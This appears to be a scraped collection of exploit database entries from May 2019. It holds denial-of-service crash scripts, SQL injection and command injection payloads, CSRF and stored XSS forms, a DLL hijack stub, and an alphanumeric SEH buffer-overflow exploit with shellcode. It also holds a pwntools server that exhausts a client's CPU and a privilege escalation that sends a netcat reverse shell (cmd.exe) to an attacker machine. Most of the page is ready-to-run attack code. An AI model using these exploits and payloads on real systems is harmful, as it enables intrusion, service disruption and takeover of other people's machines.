All posts published by ISHACK AI BOT
-
TwistedBrush Pro Studio 24.06 - 'Script Recorder' Denial of Service (PoC)
# -*- coding: utf-8 -*-
# Exploit Title: TwistedBrush Pro Studio 24.06 - 'Script Recorder' Denial of Service (PoC)
# Date: 13/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.pixarra.com
# Software Link: http://www.pixarra.com/uploads/9/4/6/3/94635436/tbrusha.exe
# Version: 24.06
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "TwistedBrush_recorder.py", it will create a new file "PoC.txt"
# 2.- Copy the text from the generated PoC.txt file to clipboard
# 3.- Open TwistedBrush Pro Studio
# 4.- Go to 'Record' > 'Script Recorder...'
# 5.- Paste clipboard in the 'Description' field
# 6.- Click 'Brush' button
# 7.- Crashed

buffer = "\x41" * 500000
f = open("PoC.txt", "w")
f.write(buffer)
f.close()
-
TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC)
# -*- coding: utf-8 -*-
# Exploit Title: TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC)
# Date: 13/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.pixarra.com
# Software Link: http://www.pixarra.com/uploads/9/4/6/3/94635436/tbrusha.exe
# Version: 24.06
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "TwistedBrush_player.py", it will create a new file "sample.srp"
# 2.- Open TwistedBrush Pro Studio
# 3.- Go to 'Record' > 'Script Player...'
# 4.- Click 'Import' button, select the 'sample.srp' file created and click 'Open' button
# 5.- Crashed

buffer = "\x41" * 500000
f = open("sample.srp", "w")
f.write(buffer)
f.close()
-
Tomabo MP4 Converter 3.25.22 - Denial of Service (PoC)
# -*- coding: utf-8 -*-
# Exploit Title: MP4 Converter 3.25.22 - 'Name' Denial of Service (PoC)
# Date: 14/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.tomabo.com/
# Software: http://www.tomabo.com/downloads/mp4-converter-setup.exe
# Version: 3.25.22
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "MP4Converter.py", it will create a new file "MP4Converter.txt"
# 2.- Copy the text from the generated MP4Converter.txt file to clipboard
# 3.- Open MP4 Converter
# 4.- Select 'Options' > 'Video/Audio Formats'
# 5.- Click 'Add Preset' and paste clipboard in the field 'Name'
# 6.- Click 'OK' and click 'Reset All'
# 7.- Crashed

buffer = "\x41" * 10000
f = open("MP4Converter.txt", "w")
f.write(buffer)
f.close()
-
Schneider Electric U.Motion Builder 1.3.4 - 'track_import_export.php object_id' Unauthenticated Command Injection
RCE Security Advisory
https://www.rcesecurity.com

1. ADVISORY INFORMATION
=======================
Product:        Schneider Electric U.Motion Builder
Vendor URL:     www.schneider-electric.com
Type:           OS Command Injection [CWE-78]
Date found:     2018-11-15
Date published: 2019-05-13
CVSSv3 Score:   9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVE:            CVE-2018-7841

2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from RCE Security.

3. VERSIONS AFFECTED
====================
Schneider Electric U.Motion Builder 1.3.4 and below

4. INTRODUCTION
===============
Comfort, Security and Energy Efficiency – these are the qualities that you as home owner expect from a futureproof building management solution.

(from the vendor's homepage)

5. VULNERABILITY DETAILS
========================
The script "track_import_export.php" is vulnerable to an unauthenticated command injection vulnerability when user-supplied input to the HTTP GET/POST parameter "object_id" is processed by the web application. Since the application does not properly validate and sanitize this parameter, it is possible to inject arbitrary commands into a PHP exec call. This is a bypass to the fix implemented for CVE-2018-7765.

The following Proof-of-Concept triggers this vulnerability, causing a 10-second sleep:

POST /smartdomuspad/modules/reporting/track_import_export.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=l337qjbsjk4js9ipm6mppa5qn4
Content-Type: application/x-www-form-urlencoded
Content-Length: 86

op=export&language=english&interval=1&object_id=`sleep 10`

6. RISK
=======
To successfully exploit this vulnerability an unauthenticated attacker must only have network-level access to a vulnerable instance of U.Motion Builder or a product that depends on it.

The vulnerability can be used to inject arbitrary OS commands, which leads to the complete compromise of the affected installation.

7. SOLUTION
===========
Uninstall/remove the installation. The product has been retired shortly after notifying the vendor about this issue, so no fix will be published.

8. REPORT TIMELINE
==================
2018-11-14: Discovery of the vulnerability
2018-11-14: Tried to notify vendor via their vulnerability report form but unfortunately the form returned some 403 error
2018-11-14: Tried to contact the vendor via Twitter (public tweet and DM)
2018-11-19: No response from vendor
2018-11-20: Tried to contact the vendor via Twitter again
2018-11-20: No response from vendor
2019-01-04: Without further notice the contact form worked again. Sent over the vulnerability details.
2019-01-04: Response from the vendor stating that the affected code is owned by a third-party vendor. Projected completion time is October 2019.
2019-01-10: Scheduled disclosure date is set to 2019-01-22 based on policy.
2019-01-14: Vendor asks to extend the disclosure date to 2019-03-15.
2019-01-15: Agreed on the disclosure extension due to the severity of the issue
2019-02-01: No further reply from vendor. Reminded them of the regular status updates according to the disclosure policy
2019-02-04: Regular status updates from vendor from now on
2019-03-13: Vendor sends draft disclosure notification including assigned CVE-2018-7841. The draft states that the product will be retired and has already been removed from the download portal. A customer notification is published (SEVD-2019-071-02).
2019-03-14: Public disclosure is delayed to give the vendor's customers a chance to remove the product.
2019-05-13: Public disclosure

9. REFERENCES
=============
https://www.rcesecurity.com/2019/05/cve-2018-7841-schneider-electric-umotion-builder-remote-code-execution-0-day
-
PasteShr 1.6 - Multiple SQL Injection
===========================================================================================
# Exploit Title: PasteShr - SQL Inj.
# Dork: N/A
# Date: 14-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437
# Software Link: https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html
# Version: v1.6
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Pasteshr is a script which allows you to store any text online for easy sharing. The idea behind the script is to make it more convenient for people to share large amounts of text online.
===========================================================================================
# POC - SQLi
# Parameters : keyword
# Attack Pattern : %27/**/RLIKE/**/(case/**/when/**//**/9494586=9494586/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'='
# GET Method : http://localhost/pasthr/public/search?keyword=4137548[SQL Inject Here]
===========================================================================================

###########################################################################################

===========================================================================================
# Exploit Title: PasteShr - SQL Inj.
# Dork: N/A
# Date: 14-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437
# Software Link: https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html
# Version: v1.6
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Pasteshr is a script which allows you to store any text online for easy sharing. The idea behind the script is to make it more convenient for people to share large amounts of text online.
===========================================================================================
# POC - SQLi
# Parameters : password
# Attack Pattern : /**/RLIKE/**/(case/**/when/**//**/6787556=6787556/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)
# POST Method : http://localhost/pasthr/public/login?_token=1lkW1Z61RZlmfYB0Ju07cfekR6UvsqaFAfeZfi2c&email=2270391&password=6195098[SQL Inject Here]
===========================================================================================

###########################################################################################

===========================================================================================
# Exploit Title: PasteShr - SQL Inj.
# Dork: N/A
# Date: 14-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437
# Software Link: https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html
# Version: v1.6
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Pasteshr is a script which allows you to store any text online for easy sharing. The idea behind the script is to make it more convenient for people to share large amounts of text online.
===========================================================================================
# POC - SQLi
# Parameters : keyword
# Attack Pattern : %27/**/RLIKE/**/(case/**/when/**//**/8266715=8266715/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'='
# POST Method : http://localhost/pasthr/server.php/search?keyword=1901418[SQL Inject Here]
===========================================================================================
-
CommSy 8.6.5 - SQL injection
Title:
======
CommSy 8.6.5 - SQL injection

Researcher:
===========
Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG

CVE-ID:
=======
CVE-2019-11880

Timeline:
=========
2019-04-15 Vulnerability discovered
2019-04-15 Asked for security contact and PGP key
2019-04-16 Sent details to the vendor
2019-05-07 Flaw was approved but will not be fixed in branch 8.6
2019-05-15 Public disclosure

Affected Products:
==================
CommSy <= 8.6.5

Vendor Homepage:
================
https://www.commsy.net

Details:
========
CommSy is a web-based community system, originally developed at the University of Hamburg, Germany, to support learning/working communities. We have discovered an unauthenticated SQL injection vulnerability in CommSy <= 8.6.5 that makes it possible to read all database content. The vulnerability exists in the HTTP GET parameter "cid".

Proof of Concept:
=================
boolean-based blind:
commsy.php?cid=101" AND 3823=(SELECT (CASE WHEN (3823=3823) THEN 3823 ELSE (SELECT 7548 UNION SELECT 4498) END))-- dGRD&mod=context&fct=login

error-based:
commsy.php?cid=101" AND (SELECT 6105 FROM(SELECT COUNT(*),CONCAT(0x716a767871,(SELECT (ELT(6105=6105,1))),0x716b6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jzQs&mod=context&fct=login

time-based blind:
commsy.php?cid=101" AND SLEEP(5)-- MjJM&mod=context&fct=login

Fix:
====
According to the manufacturer, the version branch 8.6 is no longer supported and the vulnerability will not be fixed. Customers should update to the newest version 9.2.
-
Legrand BTicino Driver Manager F454 1.0.51 - Cross-Site Request Forgery / Cross-Site Scripting
<!--
Legrand BTicino Driver Manager F454 1.0.51 CSRF Change Password Exploit

Vendor: BTicino S.p.A.
Product web page: https://www.bticino.com
Affected version: Hardware Platform: F454
                  Firmware version: 1.0.51
                  Driver Manager version: 1.1.14

Summary: Audio/video web server for the remote control of the system using web pages or the MY HOME portal. The device can operate as a gateway for the use of the MHVisual and Virtual Configurator software - 6 DIN modules. It replaces item F453 and F453AV.

Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

Tested on: Apache/2.2.14 (Unix)
           OpenSSL/1.0.0d
           PHP/5.1.6

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2019-5521
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5521.php

30.04.2019
-->

<!-- CSRF PoC web access password change -->
<html>
  <body>
    <form action="http://192.168.1.66:8080/system/password.save.php" method="POST">
      <input type="hidden" name="password1" value="newpass123" />
      <input type="hidden" name="password2" value="newpass123" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

<!-- CSRF PoC OpenWebNet password change -->
<html>
  <body>
    <form action="http://192.168.1.66:8080/system/ownpassword.save.php" method="POST">
      <input type="hidden" name="ownpassword" value="ilegnisi" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

<!--
Legrand BTicino Driver Manager F454 1.0.51 Authenticated Stored XSS Exploit

Vendor: BTicino S.p.A.
Product web page: https://www.bticino.com
Affected version: Hardware Platform: F454
                  Firmware version: 1.0.51
                  Driver Manager version: 1.1.14

Summary: Audio/video web server for the remote control of the system using web pages or the MY HOME portal. The device can operate as a gateway for the use of the MHVisual and Virtual Configurator software - 6 DIN modules. It replaces item F453 and F453AV.

Desc: The application suffers from an authenticated stored XSS via GET request. The issue is triggered when input passed via the GET parameter 'server' is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Tested on: Apache/2.2.14 (Unix)
           OpenSSL/1.0.0d
           PHP/5.1.6

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2019-5522
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5522.php

30.04.2019
-->

<!-- Stored XSS via GET request -->
<html>
  <body>
    <form action="http://192.168.1.66:8080/system/time.ntp.php">
      <input type="hidden" name="mode" value="mine" />
      <input type="hidden" name="server" value='"><marquee>Waddup.</marquee>' />
      <input type="submit" value="Signal" />
    </form>
  </body>
</html>

<!--
GET http://192.168.1.66:8080/system/time.ntp.php?mode=mine&server="><marquee>Waddup.</marquee> HTTP/1.1
-->
-
VMware Workstation 15.1.0 - DLL Hijacking
#---------------------------------------------------------
# Title: VMware Workstation DLL hijacking < 15.1.0
# Date: 2019-05-14
# Author: Miguel Mendez Z. & Claudio Cortes C.
# Team: www.exploiting.cl
# Vendor: https://www.vmware.com
# Version: VMware Workstation Pro / Player (Workstation)
# Tested on: Windows 7_x86/7_x64 [eng]
# Cve: CVE-2019-5526
#---------------------------------------------------------

Description:
VMware Workstation contains a DLL hijacking issue because some DLL.

DLL Hijacking: shfolder.dll
Hooking: SHGetFolderPathW()

------Code_Poc-------

#include "dll.h"
#include <windows.h>
#include <stdlib.h>   /* exit() */

/* Exported with the same name as the hijacked shfolder.dll entry point */
DLLIMPORT void SHGetFolderPathW()
{
    MessageBox(0, "s1kr10s", "VMWare-Poc", MB_ICONINFORMATION);
    exit(0);
}

--------------------------

https://www.vmware.com/security/advisories/VMSA-2019-0007.html
-
DeepSound 1.0.4 - SQL Injection
===========================================================================================
# Exploit Title: DeepSound 1.0.4 - SQL Inj.
# Dork: N/A
# Date: 15-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
# Version: v1.0.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: DeepSound is a music sharing script, DeepSound is the best way to start your own music website!
===========================================================================================
# POC - SQLi
# Parameters : search_keyword
# Attack Pattern : %27 aNd 9521793=9521793 aNd %276199%27=%276199
# POST Method : http://localhost/Script/search/songs/style?filter_type=songs&filter_search_keyword=style&search_keyword=style[SQL Inject Here]
===========================================================================================

###########################################################################################

===========================================================================================
# Exploit Title: DeepSound 1.0.4 - SQL Inj.
# Dork: N/A
# Date: 15-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
# Version: v1.0.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: DeepSound is a music sharing script, DeepSound is the best way to start your own music website!
===========================================================================================
# POC - SQLi
# Parameters : description
# Attack Pattern : %27) aNd if(length(0x454d49524f474c55)>1,sleep(3),0) --%20
# POST Method : http://localhost/Script/admin?id=&description=[TEXT INPUT]2350265[SQL Inject Here]
===========================================================================================

###########################################################################################

===========================================================================================
# Exploit Title: DeepSound 1.0.4 - SQL Inj.
# Dork: N/A
# Date: 15-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
# Version: v1.0.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: DeepSound is a music sharing script, DeepSound is the best way to start your own music website!
===========================================================================================
# POC - SQLi
# Parameters : password
# Attack Pattern : %22) aNd 7595147=7595147 aNd (%226199%22)=(%226199
# POST Method : http://localhost/Script/search/songs/general?username=4929700&password=2802530[SQL Inject Here]
===========================================================================================

###########################################################################################
-
WeChat for Android 7.0.4 - 'vcodec2_hls_filter' Denial of Service
# Exploit Title: DoS Wechat with an emoji
# Date: 16-May-2019
# Exploit Author: Hong Nhat Pham
# Vendor Homepage: http://www.tencent.com/en-us/index.html
# Software Link: https://play.google.com/store/apps/details?id=com.tencent.mm
# Version: 7.0.4
# Tested on: Android 9.0
# CVE : CVE-2019-11419

Description:
vcodec2_hls_filter in libvoipCodec_v7a.so in WeChat application for Android results in a DoS by replacing an emoji file (under the /sdcard/tencent/MicroMsg directory) with a crafted .wxgf file. Crash-log is provided in poc.zip file at https://drive.google.com/open?id=1HFQtbD10awuUicdWoq3dKVKfv0wvxOKS

Vulnerability Type: Denial of Service

Vendor of Product: Tencent

Affected Product Code Base: WeChat for Android - Up to latest version (7.0.4)

Affected Component: Function vcodec2_hls_filter in libvoipCodec_v7a.so

Attack Type: Local

Attack vector:
A malware app can craft a malicious emoji file and overwrite the emoji files under /sdcard/tencent/MicroMsg/[User_ID]/emoji/[WXGF_ID]. Once the user opens any chat messages that contain an emoji, WeChat will instantly crash.

POC:
Video at https://drive.google.com/open?id=1x1Z3hm4j8f4rhv_WUp4gW-bhdtZMezdU

User must have sent or received a GIF file in WeChat

Malware app must retrieve the phone's IMEI. For POC, we can use the below command
adb shell service call iphonesubinfo 1 | awk -F "'" '{print $2}' | sed '1 d' | tr -d '.' | awk '{print}' ORS=-

Produce the malicious emoji file with the retrieved IMEI (use encrypt_wxgf.py in poc.zip):
python encrypt.py crash4.wxgf [SIZE_OF_EMOJI_ON_SDCARD]

Replace /sdcard/tencent/MicroMsg/[User_ID]/emoji/[WXGF_ID] with the padded out.wxgf.encrypted

WeChat will now crash when a message that contains the overwritten emoji file is opened

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46853.zip
-
JetAudio jetCast Server 2.0 - 'Log Directory' Local SEH Alphanumeric Encoded Buffer Overflow
# Title: JetAudio jetCast Server 2.0 'Log Directory' Local SEH Alphanumeric Encoded Buffer Overflow
# Date: May 13th, 2019
# Author: Connor McGarr (https://connormcgarr.github.io)
# Vendor Homepage: http://www.jetaudio.com/
# Software Link: http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/Download/jetCast/build/JCS2000.exe
# Version v2.0
# Tested on: Windows XP SP3 EN

# TO RUN:
# 1. Run python script
# 2. Copy contents of pwn.txt
# 3. Open jetCast
# 4. Select Config
# 5. Paste contents of pwn.txt into "Log directory" field
# 6. Click "OK"
# 7. Click "Start"

# For zeroing out registers before manual shellcode
zero = "\x25\x01\x01\x01\x01"   # and eax, 0x01010101
zero += "\x25\x10\x10\x10\x10"  # and eax, 0x10101010

# Save old stack pointer
restore = "\x54"   # push esp
restore += "\x59"  # pop ecx
restore += "\x51"  # push ecx

# Align the stack to 0012FFAD. Leaving enough room for shell. Using calc.exe for now.
# 4C4F5555 4C4F5555 4D505555
alignment = "\x54"                   # push esp
alignment += "\x58"                  # pop eax
alignment += "\x2d\x4c\x4f\x55\x55"  # sub eax, 0x4C4F5555
alignment += "\x2d\x4c\x4f\x55\x55"  # sub eax, 0x4C4F5555
alignment += "\x2d\x4d\x50\x55\x55"  # sub eax, 0x4D505555
alignment += "\x50"                  # push eax
alignment += "\x5c"                  # pop esp

# calc.exe - once again, giving you enough room with alignment for shell. Calc.exe for now.
# 2C552D14 01552D14 01562E16
shellcode = zero
shellcode += "\x2d\x14\x2d\x55\x2c"  # sub eax, 0x2C552D14
shellcode += "\x2d\x14\x2d\x55\x01"  # sub eax, 0x01552D14
shellcode += "\x2d\x16\x2e\x56\x01"  # sub eax, 0x01562E16
shellcode += "\x50"                  # push eax

# 24121729 24121739 2414194A
shellcode += zero
shellcode += "\x2d\x29\x17\x12\x24"  # sub eax, 0x24121729
shellcode += "\x2d\x39\x17\x12\x24"  # sub eax, 0x24121739
shellcode += "\x2d\x4a\x19\x14\x24"  # sub eax, 0x2414194A (was 40 at the end, but a miscalc happened. Changed to 4A)
shellcode += "\x50"                  # push eax

# 34313635 34313434 34313434
shellcode += zero
shellcode += "\x2d\x35\x36\x31\x34"  # sub eax, 0x34313635
shellcode += "\x2d\x34\x34\x31\x34"  # sub eax, 0x34313434
shellcode += "\x2d\x34\x34\x31\x34"  # sub eax, 0x34313434
shellcode += "\x50"                  # push eax

# 323A1245 323A1245 333A1245
shellcode += zero
shellcode += "\x2d\x45\x12\x3a\x32"  # sub eax, 0x323A1245
shellcode += "\x2d\x45\x12\x3a\x32"  # sub eax, 0x323A1245
shellcode += "\x2d\x45\x12\x3a\x33"  # sub eax, 0x333A1245
shellcode += "\x50"                  # push eax

# Restore old stack pointer. MOV ECX,ESP
move = zero
move += "\x2d\x40\x3f\x27\x11"  # sub eax, 0x11273F40
move += "\x2d\x3f\x3f\x27\x11"  # sub eax, 0x11273F3F
move += "\x2d\x3f\x3f\x28\x11"  # sub eax, 0x11283F3F
move += "\x50"                  # push eax

payload = "\x41" * 520
payload += "\x70\x06\x71\x06"  # JO 6 bytes. If jump fails, default to JNO 6 bytes into shellcode.
payload += "\x2d\x10\x40\x5f"  # pop pop ret MFC42.DLL
payload += "\x41" * 2          # Padding to reach first instruction
payload += restore
payload += alignment
payload += shellcode
payload += move

# Using ECX for holding old ESP. \x41 = INC ECX
# so using \x42 = INC EDX instead.
payload += "\x42" * (5000 - len(payload))

f = open('pwn.txt', 'w')
f.write(payload)
f.close()
-
ZOC Terminal 7.23.4 - 'Script' Denial of Service (PoC)
#Exploit Title: ZOC Terminal v7.23.4 - 'Script' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-15
#Vendor Homepage: https://www.emtec.com
#Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe
#Tested Version: 7.23.4
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: ZOC_Terminal_scr.py and it will create a new file "exp.zrx"
#2.- Open ZOC Terminal
#3.- Select Script > Start REXX Script...
#4.- Select "exp.zrx" file and click "open"
#5.- Crashed

cod = "\x41" * 20000
f = open('exp.zrx', 'w')
f.write(cod)
f.close()
-
ZOC Terminal v7.23.4 - 'Private key file' Denial of Service (PoC)
#Exploit Title: ZOC Terminal v7.23.4 - 'Private key file' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-15
#Vendor Homepage: https://www.emtec.com
#Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe
#Tested Version: 7.23.4
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: ZOC_Terminal_pkf.py
#2.- Open zoc_pkf.txt and copy content to clipboard
#3.- Open ZOC Terminal
#4.- Select File > Create SSH Key Files...
#5.- Select "Private key file:" field, erase it and paste clipboard
#6.- Click on "Create public/private key files..."
#7.- Crashed

cod = "\x41" * 2000
f = open('zoc_pkf.txt', 'w')
f.write(cod)
f.close()
-
ZOC Terminal v7.23.4 - 'Shell' Denial of Service (PoC)
#Exploit Title: ZOC Terminal v7.23.4 - 'Shell' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-15
#Vendor Homepage: https://www.emtec.com
#Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe
#Tested Version: 7.23.4
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: ZOC_Terminal_sh.py
#2.- Open zoc_sh.txt and copy content to clipboard
#3.- Open ZOC Terminal
#4.- Select Options > Program Settings... > Special Files
#5.- Select "Shell" field, erase the content and paste clipboard
#6.- Click on "Save"
#7.- Select View > "Command Shell" and select "ok"
#8.- Crashed

cod = "\x41" * 270
f = open('zoc_sh.txt', 'w')
f.write(cod)
f.close()
-
Axessh 4.2 - 'Log file name' Denial of Service (PoC)
#Exploit Title: Axessh 4.2 'Log file name' - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-14
#Vendor Homepage: http://www.labf.com
#Software Link: http://www.labf.com/download/axessh.exe
#Tested Version: 4.2
#Tested on: Windows 7 Service Pack 1 x32

#Steps to produce the crash:
#1.- Run python code: Axessh_4.2.py
#2.- Open Axess.txt and copy content to clipboard
#3.- Open Axessh.exe
#4.- In "Telnet Connect Host" select "Details>>" > "Settings"
#5.- Select "Logging" and enable "Log all sessions output"
#6.- In "Log file name" paste Clipboard
#7.- Select "OK" and in "Telnet Connect Host" select "Ok"
#8.- Crashed

cod = "\x41" * 500
f = open('Axess.txt', 'w')
f.write(cod)
f.close()
-
SEL AcSELerator Architect 2.2.24 - CPU Exhaustion Denial of Service
#!/usr/bin/env python
# coding: utf8
#
#
# SEL AcSELerator Architect 2.2.24 Remote CPU Exhaustion Denial of Service
#
#
# Vendor: Schweitzer Engineering Laboratories, Inc.
# Product web page: https://www.selinc.com
# Affected version: 2.2.24.0 (ICD package version: 2.38.0)
#
# Summary: Substation communications networks using the IEC 61850
# MMS and GOOSE protocols require a systemic methodology to configure
# message publications and subscriptions. acSELerator Architect
# SEL-5032 Software is a Microsoft Windows application that streamlines
# the configuration and documentation of IEC 61850 control and SCADA
# communications.
#
# Description: AcSELerator Architect is prone to a denial-of-service (DoS)
# vulnerability. An attacker may exploit this issue to cause CPU exhaustion,
# resulting in the application being rendered non-responsive (AppHangB1 event).
#
# Tested on: Microsoft Windows 7 Ultimate SP1 (EN) 32bit
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
#
# Advisory: https://applied-risk.com/index.php/download_file/view/106/165
# ICS-CERT: https://ics-cert.us-cert.gov/advisories/ICSA-18-191-02
# CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10608
#
# 22.02.2018
#

import sys
from pwn import *

# Oversized reply handed to the connecting FTP client
cool_data = '\x4A' * 54321


def bunn():
    print("""
####################################
SEL AcSELerator Architect 2.2.24.0
FTP Client Remote CPU Exhaustion
(c) 2018
####################################
""")


def main():
    # Listen on the port the Architect FTP client connects to
    p = listen(2121)
    try:
        log.warn('Payload ready for deployment...(Ctrl-C for exit)\n')
        while True:
            p.wait_for_connection()
            if p:
                sys.stdout.write('▓≡')
                p.send(cool_data)
    except KeyboardInterrupt:
        p.success('OK!')
        p.close()
    except EOFError:
        print("Unexpected error brah: %s" % sys.exc_info()[0])
        p.close()


if __name__ == '__main__':
    bunn()
    main()
-
Sandboxie 5.30 - 'Programs Alerts' Denial of Service (PoC)
# -*- coding: utf-8 -*-
# Exploit Title: Sandboxie 5.30 - Denial of Service (PoC)
# Date: 16/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://www.sandboxie.com
# Software: https://www.sandboxie.com/SandboxieInstall.exe
# Version: 5.30
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script 'Sandboxie.py', it will create a new file 'Sandboxie.txt'
# 2.- Copy the text from the generated Sandboxie.txt file to clipboard
# 3.- Open Sandboxie Control
# 4.- Go to 'Configure' > 'Programs Alerts'
# 5.- Click 'Add Program', paste clipboard in the field 'Select or enter a program' and click 'OK'
# 6.- Click 'OK' and crashed

buffer = "\x41" * 5000
f = open("Sandboxie.txt", "w")
f.write(buffer)
f.close()
-
CEWE Photoshow 6.4.3 - 'Password' Denial of Service (PoC)
# -*- coding: utf-8 -*-
# Exploit Title: CEWE PHOTO SHOW 6.4.3 - Denial of Service (PoC)
# Date: 16/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://cewe-photoworld.com/
# Software: https://cewe-photoworld.com/creator-software/windows-download
# Version: 6.4.3
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script 'photoshow.py', it will create a new file 'photoshow.txt'
# 2.- Copy the text from the generated photoshow.txt file to clipboard
# 3.- Open CEWE PHOTO SHOW
# 4.- Click 'Upload'
# 5.- Paste clipboard in the field 'Password' and crashed

buffer = "\x41" * 5000
f = open("photoshow.txt", "w")
f.write(buffer)
f.close()
-
CEWE Photo Importer 6.4.3 - '.jpg' Denial of Service (PoC)
# -*- coding: utf-8 -*-
# Exploit Title: CEWE PHOTO IMPORTER 6.4.3 - Denial of Service (PoC)
# Date: 16/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://cewe-photoworld.com/
# Software: https://cewe-photoworld.com/creator-software/windows-download
# Version: 6.4.3
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script 'photoimporter.py', it will create a new file "sample.jpg"
# 2.- Open CEWE PHOTO IMPORTER
# 3.- Select the 'sample.jpg' file created and click 'Import all'
# 4.- Click 'Next' and 'Next', you will see a crash

buffer = "\x41" * 500000
f = open("sample.jpg", "w")
f.write(buffer)
f.close()
-
Iperius Backup 6.1.0 - Privilege Escalation
Exploit Author: bzyo
Twitter: @bzyo_
Exploit Title: Iperius Backup 6.1.0 - Privilege Escalation
Date: 04-24-19
Vulnerable Software: Iperius Backup 6.1.0
Vendor Homepage: https://www.iperiusbackup.com/
Version: 6.1.0
Software Link: https://www.iperiusbackup.com/download.aspx
Tested on: Windows 10 x64

Details:
Iperius Backup Service must run as Local System or a system administrator. By default the application allows low-privilege users to create/run backup jobs and edit existing jobs, because of the file permissions on its data folder. One option when creating a backup job is to run a program before or after the backup job. The backup job runs as the user of the running service, so the program requested to run before or after the job runs as that same user. A low-privilege user can abuse this to escalate their privileges to either Local System or an administrator account.

Vendor Post - Installation as Windows service: what it is and why it's important
https://www.iperiusbackup.net/en/installation-windows-service-iperius-backup/

Prerequisites:
To successfully exploit this vulnerability, an attacker must already have local access to a system running Iperius Backup and Iperius Backup Service using a low-privileged user account.

Exploit:
1. Login as low privilege user where Iperius Backup and Iperius Backup Service are installed
2. Download netcat from attacking machine
   c:\users\low\downloads\nc.exe
3. Create batch file calling netcat and sending command prompt to attacking machine
   c:\users\low\desktop\evil.bat
     @echo off
     c:\users\low\downloads\nc.exe 192.168.0.163 443 -e cmd.exe
4. Setup listener on attacking machine
   nc -nlvvp 443
5. Open Iperius Backup and create new backup job
   - set any folder to backup (c:\temp)
   - set to any destination (c:\users\low\desktop)
   - set program to run before backup job (c:\users\low\desktop\evil.bat)
6. Right-click on newly created job and select "Run backup service as"
   - will either be local system or administrator account
